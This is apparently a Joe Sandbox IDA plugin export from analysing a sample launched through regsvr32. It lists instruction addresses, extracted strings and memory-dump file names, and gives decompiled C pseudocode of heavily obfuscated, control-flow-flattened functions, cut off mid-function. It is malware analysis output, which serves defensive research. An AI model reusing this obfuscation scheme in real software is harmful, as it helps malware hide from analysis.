0x04f64a3a
0x04f64a3e
0x04f64a42
0x04f64a42
0x04f64a42
0x04f64a46
0x04f64a46
0x04f64a48
0x04f64a49
0x04f64a49
0x04f64a49
0x04f64a4e
0x00000000
0x00000000
0x04f64a54
0x04f64a54
0x04f64c60
0x04f64c70
0x04f64c75
0x04f64c7b
0x04f64c83
0x04f64c8b
0x04f64c93
0x04f64c9b
0x04f64ca8
0x04f64cab
0x04f64caf
0x04f64cb7
0x04f64cbf
0x04f64ccf
0x04f64cd8
0x04f64cdb
0x04f64cdf
0x04f64ce7
0x04f64cef
0x04f64cf4
0x04f64d01
0x04f64d05
0x04f64d0d
0x04f64d1d
0x04f64d21
0x04f64d29
0x04f64d2e
0x04f64d36
0x04f64d3e
0x04f64d46
0x04f64d4b
0x04f64d53
0x04f64d5b
0x04f64d67
0x04f64d6c
0x04f64d72
0x04f64d7a
0x04f64d82
0x04f64d8f
0x04f64d92
0x04f64d96
0x04f64d9e
0x04f64dab
0x04f64db7
0x04f64dbb
0x04f64dc3
0x04f64dcb
0x04f64dd0
0x04f64dd5
0x04f64ddd
0x04f64de9
0x04f64dec
0x04f64df0
0x04f64df5
0x04f64dfd
0x04f64e05
0x04f64e16
0x04f64e1a
0x04f64e22
0x04f64e30
0x04f64e3b
0x04f64e43
0x04f64e4b
0x04f64e53
0x04f64e5b
0x04f64e63
0x04f64e6b
0x04f64e70
0x04f64e78
0x04f64e80
0x04f64e84
0x04f64e8c
0x04f64e91
0x04f64ee7
0x04f64ee9
0x04f64eec
0x04f64ef0
0x04f64ef2
0x04f64f01
0x04f64ef4
0x04f64ef6
0x04f64efb
0x04f64efb
0x04f64a46
0x04f64a48
0x04f64a49
0x04f64a49
0x04f64a49
0x04f64a4e
0x00000000
0x00000000
0x00000000
0x04f64a4e
0x00000000
0x04f64a49
0x04f64a5f
0x04f64b72
0x04f64b7f
0x04f64b88
0x04f64b8c
0x04f64b94
0x04f64b9c
0x04f64ba4
0x04f64bac
0x04f64bb4
0x04f64bbc
0x04f64bc6
0x04f64bce
0x04f64bd6
0x04f64bde
0x04f64be6
0x04f64bee
0x04f64bf3
0x04f64bfb
0x04f64c03
0x04f64c0b
0x04f64c13
0x04f64c1b
0x04f64c23
0x04f64c2b
0x04f64c4e
0x04f64c53
0x04f64c56
0x04f64a42
0x04f64a42
0x04f64a42
0x00000000
0x04f64a42
0x04f64a42
0x04f64a6a
0x04f64b4f
0x04f64b55
0x04f64b60
0x04f64b60
0x04f64b63
0x00000000
0x00000000
0x04f64b5d
0x04f64b5d
0x04f64b5d
0x04f64b65
0x04f64b68
0x00000000
0x04f64b68
0x04f64a75
0x04f65287
0x04f65297
0x04f6529c
0x04f652a2
0x04f652aa
0x04f652b2
0x04f652ba
0x04f652c6
0x04f652cb
0x04f652cf
0x04f652cf
0x04f652cf
0x04f652df
0x04f652e8
0x04f652f1
0x04f652f1
0x04f64a80
0x04f65277
0x04f65277
0x04f6527c
0x00000000
0x00000000
0x04f6527e
0x00000000
0x04f6527e
0x04f64a86
0x04f64a90
0x04f64a96
0x04f64a9b
0x04f64aa6
0x04f64aa7
0x04f64aab
0x04f64ab0
0x04f64ab4
0x04f64abc
0x04f64ac4
0x04f64acc
0x04f64ad4
0x04f64ae2
0x04f64ae6
0x04f64aee
0x04f64af6
0x04f64afe
0x04f64b06
0x04f64b0e
0x04f64b16
0x04f64b33
0x04f64b38
0x04f64b3a
0x04f64b3f
0x00000000
0x00000000
0x04f64b45
0x04f64a42
0x04f64a42
0x04f64a42
0x00000000
0x04f64a42
0x04f64f0b
0x04f64f0b
0x04f64f10
0x04f65010
0x04f65021
0x04f65024
0x04f65028
0x04f65030
0x04f65038
0x04f65046
0x04f65047
0x04f6504d
0x04f65052
0x04f65057
0x04f6505f
0x04f65067
0x04f6506c
0x04f65074
0x04f65079
0x04f65081
0x04f6508f
0x04f65093
0x04f6509b
0x04f650b8
0x04f650bd
0x04f650c7
0x04f650d2
0x04f650d9
0x04f650e1
0x04f650f0
0x04f650f3
0x04f650f7
0x04f65104
0x04f65108
0x04f65110
0x04f65118
0x04f65120
0x04f65125
0x04f6512d
0x04f65135
0x04f65142
0x04f65146
0x04f65150
0x04f65154
0x04f6515c
0x04f65164
0x04f65174
0x04f65178
0x04f65180
0x04f65188
0x04f65194
0x04f65197
0x04f6519f
0x04f651a4
0x04f651b1
0x04f651b7
0x04f651c3
0x04f651e0
0x04f651e5
0x04f651ef
0x04f651f4
0x04f651fc
0x04f65204
0x04f65209
0x04f65211
0x04f65219
0x04f65221
0x04f65229
0x04f65231
0x04f65239
0x04f65247
0x04f6524b
0x04f6524f
0x04f6524f
0x04f6524f
0x04f65267
0x04f6526c
0x04f6526f
0x04f65276
0x00000000
0x04f65276
0x04f64f16
0x04f64f1b
0x04f64fae
0x04f64fb8
0x04f64fc6
0x04f64fcb
0x04f64fcf
0x04f64fd7
0x04f64fe4
0x04f64fe8
0x04f64ff0
0x04f65000
0x04f65006
0x04f64a42
0x04f64a42
0x04f64a42
0x00000000
0x04f64a42
0x04f64a42
0x04f64f21
0x04f64f26
0x00000000
0x00000000
0x04f64f2c
0x04f64f3c
0x04f64f41
0x04f64f47
0x04f64f53
0x04f64f58
0x04f64f5e
0x04f64f66
0x04f64f6e
0x04f64f76
0x04f64f82
0x04f64f89
0x04f64f8d
0x04f64f9d
0x04f64fa4
0x00000000
0x04f64fa4
0x04f64a49
0x04f64a46

Strings

k_, xrefs: 04F64BFB
./F_, xrefs: 04F652B2
@, xrefs: 04F64B45
Ksto, xrefs: 04F64E70
zC, xrefs: 04F64B8C
tW, xrefs: 04F65229
c_2, xrefs: 04F651FC
x, xrefs: 04F6524F
!8, xrefs: 04F64AE6
@, xrefs: 04F64A49
bG_, xrefs: 04F64A90

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: !8$./F_$@$@$Ksto$bG_$c_2$k_$tW$x$zC
API String ID: 0-1634811907
Opcode ID: 8863646fe3fc154aa3d7e0bd1a034268dd4c58721281e785b8811ffc1321cefc
Instruction ID: e7c59b998929dbd5895b4c971f3c29e5a38d59b0503c2aa9b7e80b53a7a289c2
Opcode Fuzzy Hash: 8863646fe3fc154aa3d7e0bd1a034268dd4c58721281e785b8811ffc1321cefc
Instruction Fuzzy Hash: 80321072508341AFD358CF65D58980BBBE2FBC4748F10991EF1969A260D3B4DA49CF87

Uniqueness

Uniqueness Score: -1.00%

Function 04F74D2B Relevance: 12.7, Strings: 10, Instructions: 228
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E04F74D2B(intOrPtr* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				void* _t211;
				void* _t213;
				intOrPtr _t224;
				signed int _t225;
				signed int _t229;
				intOrPtr _t234;
				signed int _t235;
				intOrPtr* _t238;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				intOrPtr* _t254;
				signed int _t255;
				void* _t258;
				void* _t259;

				_push(_a16);
				_t238 = __edx;
				_t254 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04F732C4(_t211);
				_t259 = _t258 + 0x18;
				_v20 = 0xdf497;
				_t255 = 0;
				_v16 = 0x89970;
				_t213 = 0xec3c5;
				_v12 = 0;
				_v8 = 0;
				do {
					while(_t213 != 0x39291) {
						if(_t213 == 0x92534) {
							_v56 = 0xdc99d5;
							_v56 = _v56 ^ 0x0f958fac;
							_v56 = _v56 + 0x103f;
							_v56 = _v56 + 0xb39b;
							_v56 = _v56 ^ 0x0f49da52;
							_v44 = 0x62b806;
							_t243 = 0x15;
							_v44 = _v44 * 0xc;
							_v44 = _v44 ^ 0x04ac92fc;
							_v64 = 0xa489e6;
							_v64 = _v64 + 0xb0ed;
							_v64 = _v64 * 0x63;
							_t244 = 0x66;
							_v64 = _v64 / _t243;
							_v64 = _v64 ^ 0x0305dba3;
							_v48 = 0xf11f5c;
							_push(_t244);
							_push(_t244);
							_v48 = _v48 * 0x59;
							_v48 = _v48 + 0x9d42;
							_v48 = _v48 ^ 0x53d36d7d;
							_v60 = 0x78ebb6;
							_v60 = _v60 ^ 0xef59011a;
							_v60 = _v60 >> 0xa;
							_v60 = _v60 << 0xc;
							_v60 = _v60 ^ 0xbc88c8e1;
							_v40 = 0xf31d06;
							_v40 = _v40 + 0xffff114b;
							_v40 = _v40 ^ 0x00feae4c;
							_v36 = 0x90f246;
							_v36 = _v36 + 0x40eb;
							_v36 = _v36 ^ 0x00914885;
							_v32 = 0x416b74;
							_v32 = _v32 ^ 0x580e87b7;
							_v32 = _v32 ^ 0x584182f9;
							_v52 = 0x7362a1;
							_v52 = _v52 / _t244;
							_v52 = _v52 ^ 0x5d6395cd;
							_v52 = _v52 ^ 0x5d6e1224;
							_t224 =  *0x4f8220c; // 0x0
							_t242 = _v44;
							_t225 = E04F7B2AA(_t242, _v64,  *((intOrPtr*)(_t224 + 0x60)), _v48, _v60, _t255, _v40, _v36, _t255,  *_t238,  &_v24,  *((intOrPtr*)(_t238 + 4)), _v32, _v52, _t244, _v56);
							_t259 = _t259 + 0x40;
							__eflags = _t225;
							if(__eflags == 0) {
								_t213 = 0xa1664;
								continue;
							}
						} else {
							if(_t213 == 0xa1664) {
								_v56 = 0x7e8f6b;
								_v56 = _v56 ^ 0xc9d1d1ad;
								_v56 = _v56 * 0x60;
								_v56 = _v56 + 0xffffb21e;
								_v56 = _v56 ^ 0xa1c55901;
								_v52 = 0xd5c152;
								_v52 = _v52 ^ 0x8fc798d9;
								_v52 = _v52 << 6;
								_v52 = _v52 ^ 0xc498a87a;
								_t229 = E04F73EE6(_t242, _v24, __eflags);
								_v28 = _t229;
								_t242 = _t242;
								__eflags = _t229;
								if(__eflags != 0) {
									_t213 = 0xe93e0;
									continue;
								}
							} else {
								if(_t213 == 0xe93e0) {
									_v48 = 0xe95353;
									_t10 =  &_v48; // 0xe95353
									_push(_t242);
									_push(_t242);
									_v48 =  *_t10 * 0x4f;
									_v48 = _v48 ^ 0x4800b69c;
									_v32 = 0xf651c7;
									_v32 = _v32 | 0x1895d74b;
									_v32 = _v32 ^ 0x18f9ebdf;
									_v36 = 0xe4d16e;
									_v36 = _v36 ^ 0x7d442b4c;
									_v36 = _v36 ^ 0x7da12606;
									_v56 = 0xe95354;
									_v56 = _v56 + 0xe763;
									_v56 = _v56 | 0xf9faedfd;
									_v56 = _v56 ^ 0xf9f7080e;
									_v60 = 0xb38ae8;
									_v60 = _v60 | 0x1ce0df05;
									_v60 = _v60 + 0xffff09d0;
									_v60 = _v60 | 0x96b04baa;
									_v60 = _v60 ^ 0x9ef317b1;
									_v64 = 0xb92926;
									_v64 = _v64 | 0x6f73983d;
									_v64 = _v64 * 0x67;
									_v64 = _v64 * 0x61;
									_v64 = _v64 ^ 0x691fe4e1;
									_v40 = 0x138e8a;
									_v40 = _v40 + 0x2353;
									_v40 = _v40 ^ 0x0013b215;
									_v52 = 0x73ac2d;
									_v52 = _v52 << 7;
									_v52 = _v52 | 0x2e62cc21;
									_v52 = _v52 ^ 0x3ff075d4;
									_v44 = 0xe17f1b;
									_v44 = _v44 >> 0xa;
									_v44 = _v44 ^ 0x0009d198;
									_t234 =  *0x4f8220c; // 0x0
									_t242 = _v32;
									_t235 = E04F7B2AA(_t242, _v36,  *((intOrPtr*)(_t234 + 0x60)), _v56, _v60, _v28, _v64, _v40, _v24,  *_t238,  &_v24,  *((intOrPtr*)(_t238 + 4)), _v52, _v44, _t242, _v48);
									_t259 = _t259 + 0x40;
									__eflags = _t235;
									if(__eflags == 0) {
										 *_t254 = _v28;
										_t255 = 1;
										__eflags = 1;
										 *((intOrPtr*)(_t254 + 4)) = _v24;
									} else {
										_t213 = 0x39291;
										continue;
									}
								} else {
									if(_t213 != 0xec3c5) {
										goto L14;
									} else {
										_t213 = 0x92534;
										continue;
									}
								}
							}
						}
						L17:
						return _t255;
					}
					_v60 = 0x682f49;
					_v60 = _v60 + 0xffff921d;
					_v60 = _v60 + 0x9bbb;
					_v60 = _v60 << 5;
					_v60 = _v60 ^ 0x0d03f252;
					_v32 = 0xaaaf89;
					_v32 = _v32 + 0xe123;
					_v32 = _v32 ^ 0x00a1067e;
					_v56 = 0x73e7cb;
					_v56 = _v56 + 0x6e1c;
					_v56 = _v56 ^ 0xefad2485;
					_v56 = _v56 + 0x1a37;
					_t202 =  &_v56;
					 *_t202 = _v56 ^ 0xefd87a85;
					__eflags =  *_t202;
					E04F7E4B2(_v60, _v32,  *_t202, _v56, _v28);
					_pop(_t242);
					_t213 = 0xd7077;
					L14:
					__eflags = _t213 - 0xd7077;
				} while (__eflags != 0);
				goto L17;
			}

0x04f74d32
0x04f74d36
0x04f74d38
0x04f74d3a
0x04f74d3e
0x04f74d42
0x04f74d46
0x04f74d47
0x04f74d48
0x04f74d4d
0x04f74d50
0x04f74d58
0x04f74d5a
0x04f74d62
0x04f74d67
0x04f74d6b
0x04f74d74
0x04f74d74
0x04f74d81
0x04f74f77
0x04f74f81
0x04f74f89
0x04f74f91
0x04f74f99
0x04f74fa1
0x04f74fb0
0x04f74fb3
0x04f74fb7
0x04f74fbf
0x04f74fc7
0x04f74fd4
0x04f74fde
0x04f74fdf
0x04f74fe5
0x04f74fed
0x04f74ffa
0x04f74ffb
0x04f74ffc
0x04f75000
0x04f75008
0x04f75010
0x04f75018
0x04f75020
0x04f75025
0x04f7502a
0x04f75032
0x04f7503a
0x04f75042
0x04f7504a
0x04f75052
0x04f7505a
0x04f75062
0x04f7506a
0x04f75072
0x04f7507a
0x04f75088
0x04f75090
0x04f75098
0x04f750c5
0x04f750ce
0x04f750d5
0x04f750da
0x04f750dd
0x04f750df
0x04f750e5
0x00000000
0x04f750e5
0x04f74d87
0x04f74d8c
0x04f74f08
0x04f74f10
0x04f74f1e
0x04f74f22
0x04f74f2a
0x04f74f32
0x04f74f3a
0x04f74f42
0x04f74f47
0x04f74f5b
0x04f74f60
0x04f74f64
0x04f74f65
0x04f74f67
0x04f74f6d
0x00000000
0x04f74f6d
0x04f74d92
0x04f74d97
0x04f74dab
0x04f74db3
0x04f74db8
0x04f74db9
0x04f74dba
0x04f74dbe
0x04f74dc6
0x04f74dce
0x04f74dd6
0x04f74dde
0x04f74de6
0x04f74dee
0x04f74df6
0x04f74dfe
0x04f74e06
0x04f74e0e
0x04f74e16
0x04f74e1e
0x04f74e26
0x04f74e2e
0x04f74e36
0x04f74e3e
0x04f74e46
0x04f74e53
0x04f74e5c
0x04f74e64
0x04f74e6c
0x04f74e74
0x04f74e7c
0x04f74e84
0x04f74e8c
0x04f74e91
0x04f74e99
0x04f74ea1
0x04f74ea9
0x04f74eae
0x04f74ee1
0x04f74eea
0x04f74ef1
0x04f74ef6
0x04f74ef9
0x04f74efb
0x04f75183
0x04f75185
0x04f75185
0x04f7518a
0x04f74f01
0x04f74f01
0x00000000
0x04f74f01
0x04f74d99
0x04f74d9e
0x00000000
0x04f74da4
0x04f74da4
0x00000000
0x04f74da4
0x04f74d9e
0x04f74d97
0x04f74d8c
0x04f7518e
0x04f75196
0x04f75196
0x04f750ef
0x04f750f7
0x04f750ff
0x04f75107
0x04f7510c
0x04f75114
0x04f7511c
0x04f75124
0x04f7512c
0x04f75134
0x04f7513c
0x04f75144
0x04f7514c
0x04f7514c
0x04f7514c
0x04f75164
0x04f7516a
0x04f7516b
0x04f75170
0x04f75170
0x04f75170
0x00000000

Strings

@, xrefs: 04F75052
4%, xrefs: 04F74DA4
#, xrefs: 04F7511C
wp, xrefs: 04F75170
L+D}, xrefs: 04F74DE6
4%, xrefs: 04F74D7C
tkA, xrefs: 04F75062
I/h, xrefs: 04F750EF
SS, xrefs: 04F74DB3
wp, xrefs: 04F7516B

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #$4%$4%$I/h$L+D}$SS$tkA$wp$wp$@
API String ID: 0-32937296
Opcode ID: 76f7a35a4779965f50c9922493e0ab04649807459dad3e6956c96058defd02ae
Instruction ID: b204f0553c19d072d790c6e21867b65e028a16b9cc4bab13b1cef70edd4dc55d
Opcode Fuzzy Hash: 76f7a35a4779965f50c9922493e0ab04649807459dad3e6956c96058defd02ae
Instruction Fuzzy Hash: 6EB10171408341AFC785CF65C98980BBBF1FB88798F009A1EF59596220D3B9DA4ACF47

Uniqueness

Uniqueness Score: -1.00%

Function 04F6A9D2 Relevance: 11.9, Strings: 9, Instructions: 655
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E04F6A9D2(intOrPtr* __ecx) {
				char _v68;
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr* _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				void* _t667;
				void* _t676;
				void* _t700;
				void* _t710;
				void* _t739;
				void* _t740;
				void* _t754;
				void* _t761;
				signed int _t762;
				signed int _t768;
				signed int _t770;
				signed int _t773;
				signed int _t775;
				signed int _t776;
				signed int _t778;
				signed int _t781;
				intOrPtr _t782;
				signed int _t784;
				signed int _t787;
				signed int _t789;
				signed int _t792;
				signed int _t793;
				signed int _t801;
				void* _t805;
				intOrPtr* _t852;
				void* _t854;
				intOrPtr _t858;
				void* _t859;
				void* _t863;
				void* _t867;

				_v92 = 0x36f3;
				_t852 = __ecx;
				_t858 = 0;
				_v88 = 0x340d;
				_v96 = __ecx;
				_t754 = 0x6010e;
				_v84 = 0x58213;
				_t854 = 0x753a0;
				_v80 = 0;
				while(1) {
					L1:
					_t667 = 0xfbf49;
					while(1) {
						L2:
						_t761 = 0xa5cd1;
						while(1) {
							L3:
							_t805 = 0x25517;
							do {
								while(1) {
									L4:
									_t867 = _t754 - _t854;
									if(_t867 > 0) {
										break;
									}
									if(_t867 == 0) {
										_v140 = 0x572c1d;
										_v140 = _v140 | 0x8f5ef919;
										_t784 = 0x57;
										_v140 = _v140 / _t784;
										_v140 = _v140 + 0x7553;
										_v140 = _v140 ^ 0x01afbcac;
										_v144 = 0x3b745;
										_v144 = _v144 << 9;
										_v144 = _v144 >> 6;
										_v144 = _v144 ^ 0x43898fc8;
										_v144 = _v144 ^ 0x43981432;
										E04F79E7E(_v140, _v144, _v112);
										_t667 = 0xfbf49;
										_t754 =  ==  ? 0xfbf49 : 0x884fe;
										goto L2;
									} else {
										if(_t754 == 0x10e8f) {
											_v144 = 0x98d44a;
											_t787 = 0x18;
											_v144 = _v144 / _t787;
											_v144 = _v144 << 5;
											_v144 = _v144 >> 0xb;
											_v144 = _v144 ^ 0x00059199;
											_v132 = 0xb30190;
											_v132 = _v132 | 0x393f8703;
											_v132 = _v132 ^ 0xed0622fc;
											_v132 = _v132 ^ 0xd4b3ee9e;
											_v124 = 0x768376;
											_v124 = _v124 | 0x11fb7814;
											_v124 = _v124 ^ 0x11fefc45;
											E04F75C41(_v144, _v108, _v132, _v124);
										} else {
											if(_t754 == _t805) {
												_v144 = 0xd03ed5;
												_t789 = 0x3b;
												_v144 = _v144 * 0x24;
												_v144 = _v144 | 0x369562be;
												_v144 = _v144 ^ 0x3fdfcbdd;
												_v136 = 0x665a04;
												_v136 = _v136 / _t789;
												_v136 = _v136 >> 0x10;
												_v136 = _v136 ^ 0x0003e4e3;
												_v132 = 0x98d705;
												_v132 = _v132 * 0x2c;
												_v132 = _v132 ^ 0x1a4b3002;
												E04F8080B(_v144, _v136, _v132, _t789, _v112, _v100,  &_v104);
												_v132 = 0xe728dc;
												_v132 = _v132 + 0x70a8;
												_t859 = _t859 + 0x14;
												_v132 = _v132 ^ 0x00e79984;
												_t761 = 0xa5cd1;
												_t667 = 0xfbf49;
												_t754 =  ==  ? 0xa5cd1 : 0x2f099;
												goto L3;
											} else {
												if(_t754 == 0x2ec34) {
													_v140 = 0x3d0ac0;
													_t792 = 0x7f;
													_v140 = _v140 * 0x55;
													_v140 = _v140 * 0x6e;
													_v140 = _v140 ^ 0x7f062f68;
													_v140 = _v140 ^ 0xca7cf6b6;
													_v132 = 0x7be836;
													_t185 =  &_v132; // 0x7be836
													_t793 = 0x3e;
													_v132 =  *_t185 / _t792;
													_v132 = _v132 ^ 0x00039221;
													_v144 = 0xc8cb12;
													_v144 = _v144 * 0x43;
													_v144 = _v144 / _t793;
													_v144 = _v144 + 0x83bd;
													_v144 = _v144 ^ 0x00de9e33;
													E04F75954(_v140, _v132, _v104, _v144);
													_t754 = 0x2f099;
													while(1) {
														L1:
														_t667 = 0xfbf49;
														goto L2;
													}
												} else {
													if(_t754 == 0x2f099) {
														_v132 = 0xf31761;
														_v132 = _v132 + 0xa59c;
														_v132 = _v132 ^ 0x00f3273f;
														_v136 = 0x333db2;
														_v136 = _v136 | 0x79286556;
														_v136 = _v136 << 4;
														_v136 = _v136 ^ 0x93b6eada;
														E04F7B1FC(_v100, _v132, _v136);
														_t754 = 0x884fe;
														while(1) {
															L1:
															_t667 = 0xfbf49;
															L2:
															_t761 = 0xa5cd1;
															L3:
															_t805 = 0x25517;
															goto L4;
														}
													} else {
														if(_t754 == 0x6010e) {
															_t754 = 0x60852;
															continue;
														} else {
															if(_t754 == 0x60852) {
																_v140 = 0x51e111;
																_v140 = _v140 * 0x11;
																_v140 = _v140 ^ 0x056d814c;
																_v144 = 0x7ff073;
																_v144 = _v144 << 3;
																_v144 = _v144 ^ 0x03f2cdb0;
																_v136 = 0xb232ae;
																_v136 = _v136 << 6;
																_v136 = _v136 ^ 0x2c8d1456;
																_v132 = 0x8dfd39;
																_v132 = _v132 + 0xffff4406;
																_v132 = _v132 ^ 0x008a359d;
																_t739 = E04F7D6A7(_v140, _v144, _v136, 0x4f617b8, _v132);
																_v140 = 0xc9530;
																_v140 = _v140 << 0x10;
																_v140 = _v140 ^ 0x953ec32f;
																_v136 = 0x979ce7;
																_v136 = _v136 + 0xffff342f;
																_v136 = _v136 ^ 0x00915539;
																_v132 = 0xba7703;
																_v132 = _v132 ^ 0x51c7c902;
																_v132 = _v132 ^ 0x517a64b7;
																_v144 = 0xcc874b;
																_v144 = _v144 + 0xffff4f55;
																_v144 = _v144 ^ 0x675a4d4f;
																_v144 = _v144 ^ 0x67917feb;
																_t740 = E04F7D6A7(_v140, _v136, _v132, 0x4f61678, _v144);
																_v132 = 0xa9df79;
																_v132 = _v132 + 0xffff9b73;
																_v132 = _v132 ^ 0x00a8bb83;
																_v144 = 0x51d81f;
																_v144 = _v144 >> 2;
																_v144 = _v144 | 0x60f90a50;
																_t801 = 0x42;
																_v144 = _v144 / _t801;
																_v144 = _v144 ^ 0x0171aa97;
																_v140 = 0x5413;
																_v140 = _v140 + 0xffffe2c0;
																_v140 = _v140 * 0x62;
																_v140 = _v140 | 0x5f933451;
																_v140 = _v140 ^ 0x5f91ea05;
																_v128 = 0xbdb53d;
																_v128 = _v128 + 0x489a;
																_v128 = _v128 * 0x1d;
																_v128 = _v128 + 0xffff5207;
																_v128 = _v128 ^ 0x15883276;
																E04F62D6F( &_v108, _v132, _v144, _v140, _t739, _t801, _v128, _t740);
																_v136 = 0xe9942e;
																_t754 =  ==  ? 0xd5a10 : 0xc1810;
																_v136 = _v136 | 0x16e10a89;
																_v136 = _v136 << 7;
																_v136 = _v136 ^ 0x74ca8d5a;
																_v144 = 0xfd0fdf;
																_v144 = _v144 + 0x20d2;
																_v144 = _v144 + 0xffffc8be;
																_v144 = _v144 << 0xa;
																_v144 = _v144 ^ 0xf3e42ffb;
																_v128 = 0xf93b0a;
																_v128 = _v128 * 0x77;
																_v128 = _v128 + 0xe3c6;
																_v128 = _v128 ^ 0x73d04c48;
																_v140 = 0xbfb0b4;
																_v140 = _v140 + 0xffff79ea;
																_v140 = _v140 * 0xb;
																_v140 = _v140 ^ 0x08331158;
																E04F6845B(_v136, _v144, _v128, _v140, _t739);
																_v144 = 0x6e4ada;
																_t863 = _t859 + 0x3c;
																_v144 = _v144 * 0x45;
																_v144 = _v144 + 0x3de6;
																_v144 = _v144 ^ 0x1db0748f;
																_v136 = 0xae73e1;
																_v136 = _v136 ^ 0x47d416de;
																_v136 = _v136 + 0xffffdf43;
																_v136 = _v136 ^ 0x477d5f2c;
																_v140 = 0x5165a6;
																_v140 = _v140 * 0x4c;
																_v140 = _v140 ^ 0x182ddfda;
																_v132 = 0xf54b24;
																_v132 = _v132 * 0xd;
																_v132 = _v132 ^ 0x0c77b789;
																E04F6845B(_v144, _v136, _v140, _v132, _t740);
																_t852 = _v96;
																L13:
																_t859 = _t863 + 0xc;
																L14:
																_t854 = 0x753a0;
																L33:
																_t805 = 0x25517;
																_t761 = 0xa5cd1;
																_t667 = 0xfbf49;
															}
															goto L34;
														}
													}
												}
											}
										}
									}
									L37:
									return _t858;
								}
								if(_t754 == 0x884fe) {
									_v132 = 0x3b7bb1;
									_t762 = 0x31;
									_v132 = _v132 / _t762;
									_v132 = _v132 + 0xffff26ac;
									_v132 = _v132 ^ 0x000a6545;
									_v124 = 0xff778f;
									_v124 = _v124 ^ 0xc0fd0b8e;
									_v124 = _v124 ^ 0xc0062346;
									E04F7B1FC(_v112, _v132, _v124);
									_t754 = 0x10e8f;
									goto L33;
								} else {
									if(_t754 == _t761) {
										E04F7A0F3(_v104);
										_t754 = 0x2ec34;
										_t858 =  !=  ? 1 : _t858;
										goto L1;
									} else {
										if(_t754 == 0xb5540) {
											_v128 = 0x8cf4f2;
											_v128 = _v128 + 0x3ed8;
											_v128 = _v128 + 0xffff60a5;
											_v128 = _v128 << 5;
											_v128 = _v128 ^ 0x119af98e;
											_v140 = 0x7f04b7;
											_t768 = 0x7b;
											_v140 = _v140 * 0x48;
											_v140 = _v140 >> 0xa;
											_v140 = _v140 | 0x6e83f59c;
											_v140 = _v140 ^ 0x6e8d0224;
											_v144 = 0x94b367;
											_v144 = _v144 * 0x3e;
											_v144 = _v144 + 0xffff6d78;
											_v144 = _v144 / _t768;
											_v144 = _v144 ^ 0x0045f03c;
											_v124 = 0x6e6fef;
											_v124 = _v124 + 0xffff9838;
											_v124 = _v124 ^ 0x0069d768;
											_t676 = E04F7D6A7(_v128, _v140, _v144, 0x4f616b8, _v124);
											_v120 = 0x398fc4;
											_v120 = _v120 << 0xe;
											_v120 = _v120 ^ 0x63f784f9;
											_v128 = 0x90dbbf;
											_v128 = _v128 >> 0xf;
											_v128 = _v128 ^ 0xe20cda30;
											_v128 = _v128 ^ 0xc29791a5;
											_v128 = _v128 ^ 0x20925957;
											_v140 = 0x35532a;
											_v140 = _v140 | 0xc64bc4e0;
											_v140 = _v140 << 9;
											_v140 = _v140 ^ 0x6240f6de;
											_v140 = _v140 ^ 0x9de06b74;
											_v144 = 0x20e40f;
											_t770 = 0x3b;
											_v144 = _v144 * 0x1d;
											_v144 = _v144 * 0x6d;
											_v144 = _v144 << 6;
											_v144 = _v144 ^ 0x87f4aee8;
											_v124 = 0x1bed37;
											_v124 = _v124 | 0x8eca923f;
											_v124 = _v124 ^ 0x8ed92456;
											_v132 = 0x4b7acb;
											_v132 = _v132 >> 6;
											_v132 = _v132 + 0xac53;
											_v132 = _v132 ^ 0x000ea1fb;
											_v136 = 0x743c99;
											_v136 = _v136 / _t770;
											_v136 = _v136 << 1;
											_v136 = _v136 ^ 0x00029d5d;
											E04F784D0(_v120, _v108, _v128, _t676, _v140, _t770,  *_t852, _v144,  &_v100,  *((intOrPtr*)(_t852 + 4)), _v124, _v132, _t770, _v136);
											_v124 = 0xa5b415;
											_t754 =  ==  ? 0x25517 : 0x884fe;
											_v124 = _v124 * 0x4d;
											_v124 = _v124 ^ 0x31d1723a;
											_v144 = 0xbd69f3;
											_v144 = _v144 + 0xffff6b83;
											_v144 = _v144 << 0xd;
											_v144 = _v144 ^ 0x9aabe8b4;
											_v136 = 0x8fbaf6;
											_v136 = _v136 ^ 0x4b8fdb52;
											_v136 = _v136 + 0xd0dd;
											_v136 = _v136 ^ 0x4b0c4dd7;
											_v132 = 0x79e8fb;
											_v132 = _v132 | 0xbb6745ce;
											_v132 = _v132 << 0xf;
											_v132 = _v132 ^ 0xf6f5fb1a;
											E04F6845B(_v124, _v144, _v136, _v132, _t676);
											_t859 = _t859 + 0x48;
											goto L14;
										} else {
											if(_t754 == 0xd5a10) {
												_v124 = 0x9d52d6;
												_v124 = _v124 + 0x78e0;
												_v124 = _v124 ^ 0x009dcab6;
												_v116 = _v124;
												_v140 = 0xed1f32;
												_t773 = 0x56;
												_v140 = _v140 * 0x75;
												_v140 = _v140 * 0x16;
												_v140 = _v140 ^ 0x5024c4a9;
